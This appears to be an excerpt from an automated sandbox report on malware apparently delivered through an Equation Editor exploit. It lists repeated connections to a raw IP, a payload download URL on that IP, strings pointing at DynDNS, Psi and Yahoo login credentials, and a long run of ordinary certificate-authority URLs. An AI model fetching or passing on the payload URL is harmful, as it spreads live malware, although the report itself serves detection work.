                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: unknownTCP traffic detected without corresponding DNS query: 107.174.138.192
                  Source: EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comY equals www.linkedin.com (Linkedin)
                  Source: EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.138.192/ObliNMm2L89TSKT.exee
                  Source: EQNEDT32.EXE, 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.138.192/ObliNMm2L89TSKT.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.138.192/ObliNMm2L89TSKT.exettC:
                  Source: EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.138.192/ObliNMm2L89TSKT.exe~
                  Source: regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://BhHVua.com
                  Source: regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                  Source: regasm_svchost.exe, 00000006.00000002.1170243625.000000000272A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170492372.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170561076.00000000027EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://YRNExv3jt4mlOyqgTcLy.com
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bluemix.cl
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171202003.00000000071A0000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: regasm_svchost.exe, 00000006.00000002.1171210478.00000000071A8000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134620550.00000000071E5000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171185695.0000000007195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: regasm_svchost.exe, 00000006.00000003.1008594277.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135090826.00000000063E7000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171065005.00000000063E7000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1008807160.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1007645187.00000000063E3000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1007774418.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1009879098.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab8
                  Source: regasm_svchost.exe, 00000006.00000003.1007645187.00000000063E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?52ef7447ecc47
                  Source: regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                  Source: regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171202003.00000000071A0000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                  Source: regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bluemix.cl
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                  Source: regasm_svchost.exe, 00000006.00000003.1135239617.000000000717E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                  Source: regasm_svchost.exe, 00000006.00000002.1171192023.000000000719A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.a-cert.at0E
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com0
                  Source: regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                  Source: regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.crc.bg0
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                  Source: regasm_svchost.exe, 00000006.00000003.1135239617.000000000717E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171180869.0000000007191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                  Source: regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171032156.00000000063CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                  Source: regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171180869.0000000007191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171180869.0000000007191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171175726.000000000718A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                  Source: regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171175726.000000000718A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                  Source: regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
